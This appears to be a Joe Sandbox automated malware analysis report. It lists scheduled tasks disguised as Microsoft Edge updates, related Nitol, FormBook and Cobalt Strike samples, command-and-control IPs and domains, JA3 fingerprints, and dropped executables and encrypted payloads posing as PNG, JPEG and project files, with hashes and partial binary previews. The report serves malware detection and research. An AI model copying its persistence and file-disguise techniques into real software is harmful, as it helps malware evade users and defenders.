                                                                04:43:26Task SchedulerRun new task: MicrosoftEdgeUpdateTaskUA Task-S-1-5-18 3LjWm path: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exe
                                                                04:43:26Task SchedulerRun new task: MicrosoftEdgeUpdateTaskUA Task-S-1-5-18 mKDGY path: C:\Program Files (x86)\DfP1K3\DfP1K3.exe
                                                                04:43:51Task SchedulerRun new task: Achieve Plan productivity path: 53jGFr5v.exe
                                                                04:44:00Task SchedulerRun new task: Business Your Management Goals Elevate path: lBoqoqIC.exe
                                                                04:44:04Task SchedulerRun new task: Intuitive Business Powerful Smooth path: d0oKoK2T.exe s>1776

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                8.210.66.1832362476847-83854387.07.exeGet hashmaliciousNitolBrowse
                                                                  39.103.20.1052976587-987347589.08.exeGet hashmaliciousUnknownBrowse
                                                                    118.178.60.92873466535874-68348745.02.exeGet hashmaliciousUnknownBrowse
                                                                      2362476847-83854387.07.exeGet hashmaliciousNitolBrowse
                                                                        2o63254452-763487230.06.exeGet hashmaliciousNitolBrowse
                                                                          e2664726330-76546233.05.exeGet hashmaliciousNitolBrowse
                                                                            23567791246-764698008.02.exeGet hashmaliciousUnknownBrowse
                                                                              287438657364-7643738421.08.exeGet hashmaliciousNitolBrowse
                                                                                2749837485743-7684385786.05.exeGet hashmaliciousNitolBrowse
                                                                                  2749837485743-7684385786.05.exeGet hashmaliciousUnknownBrowse
                                                                                    2b687482300.6345827638.08.exeGet hashmaliciousUnknownBrowse
                                                                                      45631.exeGet hashmaliciousNitolBrowse
                                                                                        118.178.60.1032873466535874-68348745.02.exeGet hashmaliciousUnknownBrowse

                                                                                          Domains

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          sc-29h5.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com2873466535874-68348745.02.exeGet hashmaliciousUnknownBrowse
                                                                                          • 118.178.60.103
                                                                                          sc-2ixf.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com2976587-987347589.08.exeGet hashmaliciousUnknownBrowse
                                                                                          • 39.103.20.105
                                                                                          sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com2873466535874-68348745.02.exeGet hashmaliciousUnknownBrowse
                                                                                          • 118.178.60.9
                                                                                          2362476847-83854387.07.exeGet hashmaliciousNitolBrowse
                                                                                          • 118.178.60.9
                                                                                          2o63254452-763487230.06.exeGet hashmaliciousNitolBrowse
                                                                                          • 118.178.60.9
                                                                                          e2664726330-76546233.05.exeGet hashmaliciousNitolBrowse
                                                                                          • 118.178.60.9
                                                                                          23567791246-764698008.02.exeGet hashmaliciousUnknownBrowse
                                                                                          • 118.178.60.9
                                                                                          287438657364-7643738421.08.exeGet hashmaliciousNitolBrowse
                                                                                          • 118.178.60.9
                                                                                          2749837485743-7684385786.05.exeGet hashmaliciousNitolBrowse
                                                                                          • 118.178.60.9
                                                                                          2749837485743-7684385786.05.exeGet hashmaliciousUnknownBrowse
                                                                                          • 118.178.60.9
                                                                                          2b687482300.6345827638.08.exeGet hashmaliciousUnknownBrowse
                                                                                          • 118.178.60.9
                                                                                          45631.exeGet hashmaliciousNitolBrowse
                                                                                          • 118.178.60.9

                                                                                          ASNs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC25Lz840Dmh.exeGet hashmaliciousFormBookBrowse
                                                                                          • 8.217.17.192
                                                                                          NWPZbNcRxL.exeGet hashmaliciousFormBookBrowse
                                                                                          • 47.254.140.255
                                                                                          FIWszl1A8l.exeGet hashmaliciousGhostRatBrowse
                                                                                          • 8.217.85.20
                                                                                          5.elfGet hashmaliciousUnknownBrowse
                                                                                          • 8.209.177.126
                                                                                          2873466535874-68348745.02.exeGet hashmaliciousUnknownBrowse
                                                                                          • 8.217.59.222
                                                                                          https://199.188.109.181Get hashmaliciousUnknownBrowse
                                                                                          • 47.254.187.72
                                                                                          Fantazy.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                          • 8.214.203.178
                                                                                          6.elfGet hashmaliciousUnknownBrowse
                                                                                          • 8.222.188.75
                                                                                          Benefit_401k_2025_Enrollment.pdfGet hashmaliciousUnknownBrowse
                                                                                          • 47.246.158.153
                                                                                          123.exeGet hashmaliciousMetasploitBrowse
                                                                                          • 47.90.142.15
                                                                                          CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd2976587-987347589.08.exeGet hashmaliciousUnknownBrowse
                                                                                          • 39.103.20.105
                                                                                          5.elfGet hashmaliciousUnknownBrowse
                                                                                          • 139.240.73.120
                                                                                          4.elfGet hashmaliciousUnknownBrowse
                                                                                          • 42.120.233.253
                                                                                          AuKUol8SPU.exeGet hashmaliciousFormBookBrowse
                                                                                          • 8.136.96.106
                                                                                          frosty.x86.elfGet hashmaliciousMiraiBrowse
                                                                                          • 47.110.90.76
                                                                                          3HnH4uJtE7.exeGet hashmaliciousFormBookBrowse
                                                                                          • 8.136.96.106
                                                                                          beacon_x86.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                          • 8.148.6.140
                                                                                          beacon_x86.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                          • 8.148.6.140
                                                                                          beacon_x64.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                          • 8.148.6.140
                                                                                          CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd2976587-987347589.08.exeGet hashmaliciousUnknownBrowse
                                                                                          • 39.103.20.105
                                                                                          5.elfGet hashmaliciousUnknownBrowse
                                                                                          • 139.240.73.120
                                                                                          4.elfGet hashmaliciousUnknownBrowse
                                                                                          • 42.120.233.253
                                                                                          AuKUol8SPU.exeGet hashmaliciousFormBookBrowse
                                                                                          • 8.136.96.106
                                                                                          frosty.x86.elfGet hashmaliciousMiraiBrowse
                                                                                          • 47.110.90.76
                                                                                          3HnH4uJtE7.exeGet hashmaliciousFormBookBrowse
                                                                                          • 8.136.96.106
                                                                                          beacon_x86.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                          • 8.148.6.140
                                                                                          beacon_x86.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                          • 8.148.6.140
                                                                                          beacon_x64.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                          • 8.148.6.140

                                                                                          JA3 Fingerprints

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          37f463bf4616ecd445d4a1937da06e19Ntwph4urc1.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          • 39.103.20.105
                                                                                          • 118.178.60.9
                                                                                          • 118.178.60.103
                                                                                          2976587-987347589.08.exeGet hashmaliciousUnknownBrowse
                                                                                          • 39.103.20.105
                                                                                          • 118.178.60.9
                                                                                          • 118.178.60.103
                                                                                          yMXFgPOdf2.exeGet hashmaliciousGuLoaderBrowse
                                                                                          • 39.103.20.105
                                                                                          • 118.178.60.9
                                                                                          • 118.178.60.103
                                                                                          yMXFgPOdf2.exeGet hashmaliciousGuLoaderBrowse
                                                                                          • 39.103.20.105
                                                                                          • 118.178.60.9
                                                                                          • 118.178.60.103
                                                                                          02Eh1ah35H.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          • 39.103.20.105
                                                                                          • 118.178.60.9
                                                                                          • 118.178.60.103
                                                                                          LMSxhK1u8Z.exeGet hashmaliciousGuLoaderBrowse
                                                                                          • 39.103.20.105
                                                                                          • 118.178.60.9
                                                                                          • 118.178.60.103
                                                                                          ro7eoySJ9q.exeGet hashmaliciousGuLoaderBrowse
                                                                                          • 39.103.20.105
                                                                                          • 118.178.60.9
                                                                                          • 118.178.60.103
                                                                                          ro7eoySJ9q.exeGet hashmaliciousGuLoaderBrowse
                                                                                          • 39.103.20.105
                                                                                          • 118.178.60.9
                                                                                          • 118.178.60.103
                                                                                          4NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 39.103.20.105
                                                                                          • 118.178.60.9
                                                                                          • 118.178.60.103

                                                                                          Dropped Files

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exe2873466535874-68348745.02.exeGet hashmaliciousUnknownBrowse
                                                                                            2362476847-83854387.07.exeGet hashmaliciousNitolBrowse
                                                                                              2o63254452-763487230.06.exeGet hashmaliciousNitolBrowse
                                                                                                e2664726330-76546233.05.exeGet hashmaliciousNitolBrowse
                                                                                                  23567791246-764698008.02.exeGet hashmaliciousUnknownBrowse
                                                                                                    287438657364-7643738421.08.exeGet hashmaliciousNitolBrowse
                                                                                                      2749837485743-7684385786.05.exeGet hashmaliciousNitolBrowse
                                                                                                        2749837485743-7684385786.05.exeGet hashmaliciousUnknownBrowse
                                                                                                          2b687482300.6345827638.08.exeGet hashmaliciousUnknownBrowse
                                                                                                            45631.exeGet hashmaliciousNitolBrowse

                                                                                                              Created / dropped Files

                                                                                                              C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exe

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\DfP1K3\DfP1K3.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):54152
                                                                                                              Entropy (8bit):6.64786972992462
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:768:jE8w9LlgD9z/4vt+aEjzaXEjoN6Fdv9SqJvwjgCb2VIIL/o/rw3J:jE3LKDZjaEjza0jJRJviN21ME3J
                                                                                                              MD5:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                                                              SHA1:E33722B4790B3C83B6F180E57D1B6BEBBC6153CB
                                                                                                              SHA-256:7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
                                                                                                              SHA-512:E2B4B8F5379D3ADBB5280D1C77C2AA7F5A7212173231576BAC6D7A26109B88BC5CB377CF9D879E7BE2E36CE860C9BCDA7769A22EED5ED63797F70534C6CDDA4C
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Joe Sandbox View:
                                                                                                              • Filename: 2873466535874-68348745.02.exe, Detection: malicious, Browse
                                                                                                              • Filename: 2362476847-83854387.07.exe, Detection: malicious, Browse
                                                                                                              • Filename: 2o63254452-763487230.06.exe, Detection: malicious, Browse
                                                                                                              • Filename: e2664726330-76546233.05.exe, Detection: malicious, Browse
                                                                                                              • Filename: 23567791246-764698008.02.exe, Detection: malicious, Browse
                                                                                                              • Filename: 287438657364-7643738421.08.exe, Detection: malicious, Browse
                                                                                                              • Filename: 2749837485743-7684385786.05.exe, Detection: malicious, Browse
                                                                                                              • Filename: 2749837485743-7684385786.05.exe, Detection: malicious, Browse
                                                                                                              • Filename: 2b687482300.6345827638.08.exe, Detection: malicious, Browse
                                                                                                              • Filename: 45631.exe, Detection: malicious, Browse
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........%U..vU..vU..vK.pvL..vK.avE..vK.wv...v\.gv\..vU..v...vK.~vW..vK.`vT..vK.evT..vRichU..v........PE..L....B.O.................b...@....................@..................................g....@.....................................d.......\................-..........P...............................0...@............................................text....a.......b.................. ..`.rdata...............f..............@..@.data...............................@....rsrc...\...........................@..@.reloc..`...........................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Program Files (x86)\3q7mMte5\log.src

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\DfP1K3\DfP1K3.exe
                                                                                                              File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                                              Category:dropped
                                                                                                              Size (bytes):5059989
                                                                                                              Entropy (8bit):7.99995522609802
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:98304:QOQ8oQBU091MWehE/7o29Mtr9vBGTrBkm638mgfttxtoSrHCYE7GUcOc2s:Ho6T1MFhE/7qJwBP6TWtttriYE7kjv
                                                                                                              MD5:31B194DB4256124F96EDD75AF3A98DD1
                                                                                                              SHA1:2651275B5E020A42C1DB34760DD5B176570C4ED4
                                                                                                              SHA-256:CF817C25658BAD80B3E2EA1A389DB2BFB3C9716B540152EDFDE4A798180DDC0B
                                                                                                              SHA-512:3B7A32DB90068B01DFF2A243C726B99A588D13D289D9B122FC45F614EEDAF91E5134EC24B838CB57094DA92E874E6288234851A50B69392800EAA70ABF94D055
                                                                                                              Malicious:true
                                                                                                              Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q.....q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

                                                                                                              C:\Program Files (x86)\3q7mMte5\tbcore3U.dll

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\DfP1K3\DfP1K3.exe
                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4858192
                                                                                                              Entropy (8bit):7.9925166029554005
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:98304:9RK1dm+O6P0DvHI/Tvyegz2UrrrjRyBEXp0/aeuZmQQLFXfoGku+i17/4:9S4+O6P5OeMRrjRy7aPZbm3k8V/4
                                                                                                              MD5:2E2ADE7ED30161A2C6F44FF0CB066FBB
                                                                                                              SHA1:9D36BF07A2B42353F3D8B62C56C9B7CFF04F6E71
                                                                                                              SHA-256:4C7B1FDFCED22A7006F9A835A6A1883A0C7D84C8FBC0A887C76C7C795B2E2B3B
                                                                                                              SHA-512:8EE548365656304EB157D615C6BF98D84225D020ED79E69564B5783C85D8AE75BE5CB8AF4E4EFEC826A95985F8F8A604B5F431DCC76845EAE9DCBC597DE667F4
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~..f...........!...'.,..........D)D......@................................s...........@...........................3.R.....D.P....ps...............I.(K...Ps......................................Ks.@.............).,............................text...s+.......................... ..`.rdata...n...@......................@..@.data...............................@....%?.....O.'......................... ..`.%-[....|.....).....................@....mo:....P.I...)...I................. ..`.reloc.......Ps.......I.............@..@.rsrc........ps.......I.............@..@................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Program Files (x86)\3q7mMte5\utils.vcxproj

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\DfP1K3\DfP1K3.exe
                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                                                                              Category:dropped
                                                                                                              Size (bytes):365477
                                                                                                              Entropy (8bit):7.9993996701251575
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:6144:hiACk/u6n9aBOmmD1oQFu0oMOxKnJPWyD9Dcqt1oFsnKqW7mbZ:w8u69CghoQxoMTFQqtKFCG7mbZ
                                                                                                              MD5:A40AD6F7BC0E50B67F3BAEAD143E45E0
                                                                                                              SHA1:AD441A6BE3C719D68AE4AE0B561BA8CE05DDE516
                                                                                                              SHA-256:32F58FCFFFCF43704B18993407D27ABD0ECE0EE5B6D4616E66EBEC3A85C221A8
                                                                                                              SHA-512:6CCCED75782910D9B14CD911CC2935A182F1C1F559EFCD7E7E115AC89D70EA36D8DDBC926001E299C14ABFE1E67F997A3509C7537987933F20A8A30118FBDE09
                                                                                                              Malicious:true
                                                                                                              Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Ma."q.2....#B...R..$3br........%&'()*456789:CDEF8.210.66.183....."ijstuvwxyz....gqsqoq.net......3#..............66.183....................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{|}~........=..>.A

                                                                                                              C:\Program Files (x86)\DfP1K3\DfP1K3.exe

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Documents\l0tiFM.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):54152
                                                                                                              Entropy (8bit):6.64786972992462
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:768:jE8w9LlgD9z/4vt+aEjzaXEjoN6Fdv9SqJvwjgCb2VIIL/o/rw3J:jE3LKDZjaEjza0jJRJviN21ME3J
                                                                                                              MD5:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                                                              SHA1:E33722B4790B3C83B6F180E57D1B6BEBBC6153CB
                                                                                                              SHA-256:7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
                                                                                                              SHA-512:E2B4B8F5379D3ADBB5280D1C77C2AA7F5A7212173231576BAC6D7A26109B88BC5CB377CF9D879E7BE2E36CE860C9BCDA7769A22EED5ED63797F70534C6CDDA4C
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........%U..vU..vU..vK.pvL..vK.avE..vK.wv...v\.gv\..vU..v...vK.~vW..vK.`vT..vK.evT..vRichU..v........PE..L....B.O.................b...@....................@..................................g....@.....................................d.......\................-..........P...............................0...@............................................text....a.......b.................. ..`.rdata...............f..............@..@.data...............................@....rsrc...\...........................@..@.reloc..`...........................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Program Files (x86)\DfP1K3\log.src

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Documents\l0tiFM.exe
                                                                                                              File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                                              Category:dropped
                                                                                                              Size (bytes):5059989
                                                                                                              Entropy (8bit):7.999955225187653
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:98304:eOQ8oQBU091MWehE/7o29Mtr9vBGTrBkm638mgfttxtoSrHCYE7GUcOc2s:xo6T1MFhE/7qJwBP6TWtttriYE7kjv
                                                                                                              MD5:02531E51E43995AAED8CC9CCC9E39233
                                                                                                              SHA1:5D3A0971F315DDB5E1393EC1C6118F5D2B9ECEA7
                                                                                                              SHA-256:0EEAADC24C5991E5F0652AEF3F2845EF96F54E5F04A7803D5BE6F0B1CDA831C0
                                                                                                              SHA-512:4C3633F0CAFCDEC62A6D06F41C344BCFD07085D832C04F912978630A1028DDF247ACA43F2AD757B3509B507F6640CB2B9EB99FA690D35BAC221B6716580AFFFB
                                                                                                              Malicious:true
                                                                                                              Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

                                                                                                              C:\Program Files (x86)\DfP1K3\tbcore3U.dll

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Documents\l0tiFM.exe
                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4858192
                                                                                                              Entropy (8bit):7.992517213149572
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:98304:9RK1dm+O6P0DvHI/Tvyegz2UrrrjRyBEXp0/aeuZmQQLFXfoGku+i17/7:9S4+O6P5OeMRrjRy7aPZbm3k8V/7
                                                                                                              MD5:E6E83A72B6FF196944C2BA3016546F53
                                                                                                              SHA1:1A4C3DDE24F4E1F1D0CB327059884B845866D7F5
                                                                                                              SHA-256:F95C0DBC130D1697917DC795FA41A9656B7FBBAEEC28828089A8AA3EBCE8B258
                                                                                                              SHA-512:E843A51CCD825A534745FD3DE5A9DC2FAA29CF285EE9E5C95422B8A7336929A8BEEC19F23CF4586AA852008A22BDCA77C0961C776845D8DB4289D6D4701C90B5
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~..f...........!...'.,..........D)D......@................................s...........@...........................3.R.....D.P....ps...............I.(K...Ps......................................Ks.@.............).,............................text...s+.......................... ..`.rdata...n...@......................@..@.data...............................@....%?.....O.'......................... ..`.%-[....|.....).....................@....mo:....P.I...)...I................. ..`.reloc.......Ps.......I.............@..@.rsrc........ps.......I.............@..@................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Program Files (x86)\DfP1K3\utils.vcxproj

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Documents\l0tiFM.exe
                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                                                                              Category:dropped
                                                                                                              Size (bytes):365477
                                                                                                              Entropy (8bit):7.9993995649648095
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:6144:siACk/u6n9aBOmmD1oQFu0oMOxKnJPWyD9Dcqt1oFsnKqW7mbZ:L8u69CghoQxoMTFQqtKFCG7mbZ
                                                                                                              MD5:CE1E5F10EEB9610DD08546FF9BEA6F22
                                                                                                              SHA1:A082C9454ACDEA0AF75276898F68313D1DA4BABE
                                                                                                              SHA-256:061150D1430B72AE934BB7249C9AB31C517EB96187C194121A4ABCF5610F49E0
                                                                                                              SHA-512:7071AC5DBD15351C760CDC103ACCE62AFC3D760B64298B41BFEE74F4726CC6A4B943022D4346D01D4FB38A9BCC41D5F29CDA7563495EF6A005E1AF081D605483
                                                                                                              Malicious:true
                                                                                                              Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Ma."q.2....#B...R..$3br........%&'()*456789:CDEF8.210.66.183....."ijstuvwxyz....gqsqoq.net......3#..............66.183....................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{|}~........=..>.A

                                                                                                              C:\ProgramData\53jGFr5v.exe

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\DfP1K3\DfP1K3.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1589760
                                                                                                              Entropy (8bit):7.902586029461615
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:49152:dpdlghXgOVb8xtjkAz9U0XYRd0zb78N9hQsLXc:BlghHBAZgH0UhPc
                                                                                                              MD5:C12239FE6BC555339AA48D933FC376D2
                                                                                                              SHA1:6E569083D307281321696A487707974D5CE34075
                                                                                                              SHA-256:7416FDF7E5226BDE0ECFD90CA7E758EBBCE8A68192E855514B5C054001A4B6A7
                                                                                                              SHA-512:A6E55A300945299A550141CE340FCC3AC3E11943472877405CCD43496465AB08D17C858D0C9E92FBB5A30014F4E56946DA81A0D71599E08274141C8AA91AE70C
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...1.:f.................$...................@....@...........................&...........@..................................u..x.............................&.....................................`v&.@............0..<............................text...x".......................... ..`.rdata...t...@......................@..@.data...._..........................@....1Q[......... ...................... ..`.),E.........0......................@....sc=.... 7...@...8.................. ..`.reloc........&......@..............@..B........................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\ProgramData\atBs3ba9\d0oKoK2T.exe

                                                                                                              Download File
                                                                                                              Process:C:\ProgramData\efk2JUeS\lBoqoqIC.exe
                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):670720
                                                                                                              Entropy (8bit):7.90355961235764
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:SKg71yAoHNWR8bTH7MrcuWE/wove/j24yu/ATnZuPESLnV+pFk:1HNJDMor12mquPZjqC
                                                                                                              MD5:147936E67DBDD86961409FE7D5821DA6
                                                                                                              SHA1:C0DEB4CACF0077AA70F8B9146AFE6A4A42C3B26E
                                                                                                              SHA-256:02C61B40E05812E032242DBE59B832F07E7120906425EDE503FC1BE5AA72CC6E
                                                                                                              SHA-512:2A88480EEA1A3EE9A9C6136F552ADE888C599E54E40E9C97F939CAEE55F2F168982AC5D35FF1F3F0DD62950A45035EEC48CAF38468E21B3023C2282A3C07BB1A
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......a...%...%...%...1...)...1......C...!...w...7...w.../...w...x...1...=...1...0...%...l.....................&.......$.......$...Rich%...........................PE..d.....f.........."......@........7...B...7....@.............................@B...........`..................................................1B......0B.......@.,...........\3B. ............................ B.(.... B.8...........................................UPX0......7.............................UPX1.....@....7..4..................@....rsrc........0B......8..............@...........................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\ProgramData\efk2JUeS\lBoqoqIC.dat

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\DfP1K3\DfP1K3.exe
                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                              Category:dropped
                                                                                                              Size (bytes):57472
                                                                                                              Entropy (8bit):7.9948826495944445
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:1536:LA5UOqaSzVJk7yHWGLvQL2NjQhzehEZSVsKJYN:LsUL1PSkbvG2pkze2GYN
                                                                                                              MD5:D82D5050F2ED81F8EE1EDD16A3FAF73F
                                                                                                              SHA1:AFF90BE2D07BD7D0FE9FBA2F92D8DFC99A15AEAC
                                                                                                              SHA-256:D751E419E2E6792167BBA7748865793B8C15F9DA3E1C85AB0E318016B608BFBA
                                                                                                              SHA-512:D258071D914DFDB8E8E1EFA03E33C4C0D4D304869C23145E24ED53D133C4211BA9218066ED287AC4A869740D3CA06D8CAC03F8BC535740884652D62951F00D09
                                                                                                              Malicious:true
